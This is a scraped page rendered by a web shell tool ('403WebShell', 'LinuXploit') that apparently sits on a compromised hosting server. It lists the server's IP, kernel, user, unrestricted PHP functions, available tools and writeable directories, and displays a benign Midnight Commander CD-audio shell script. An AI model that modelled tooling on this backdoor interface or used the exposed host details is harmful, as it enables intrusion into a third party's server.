Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.135.202.168
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/libexec/mc/extfs.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/libexec/mc/extfs.d/audio
#! /bin/sh
#
# Written by Pavel Machek
# CDDB support by Adam Byrtek
#
# (C) 2000 The Free Software Foundation.
#

set -e

CDDB_SERVER="http://freedb.freedb.org"
CDDB_HANDSHAKE="hello=user+localhost+mc+1.0&proto=1"
CDDB_TIMEOUT=20 # in seconds

audiofs_list()
{
    DATE=`date +"%b %d %H:%M"`
    echo "-r--r--r-- 1 0 0 0 $DATE CDDB"
    cdparanoia -Q -d "$1" 2>&1 | grep '^[ 0-9][ 0-9][ 0-9]\.' | while read A B C
    do
	A=`echo "$A" | sed -e 's/\.//' -e 's/^\(.\)$/0\1/'`
	SIZE=`expr 44 + $B \* 2352`
	echo "-r--r--r-- 1 0 0 $SIZE $DATE track-${A}.wav"
    done
}

audiofs_copyout()
{
    if [ x"$2" = x"CDDB" ]; then
        DISCID=`cd-discid "$1" | tr " " "+"`
	if [ -z "$DISCID" ]; then
	    exit 1
	fi
        RESPONSE=`wget -q -T $CDDB_TIMEOUT -O - "$CDDB_SERVER/~cddb/cddb.cgi?cmd=cddb+query+$DISCID&$CDDB_HANDSHAKE" | tee "$3" | gawk '/^200/ { print $2,$3; }'`
	wget -q -T $CDDB_TIMEOUT -O - "$CDDB_SERVER/~cddb/cddb.cgi?cmd=cddb+read+$RESPONSE&$CDDB_HANDSHAKE" | grep -v "^#" >> "$3"
    else
        TRACK=`echo "$2" | sed 's/track-0*//' | sed 's/\.wav//'`
        cdparanoia -q -d "$1" "$TRACK" "$3" >/dev/null
    fi
}

if [ ! -b "$2" ]
then
    BASE="/dev/cdrom"
else
    BASE="$2"
fi

case "$1" in
  list) audiofs_list "$BASE"; exit 0;;
  copyout) audiofs_copyout "$BASE" "$3" "$4"; exit 0;;
esac
exit 1

Youez - 2016 - github.com/yon3zu
LinuXploit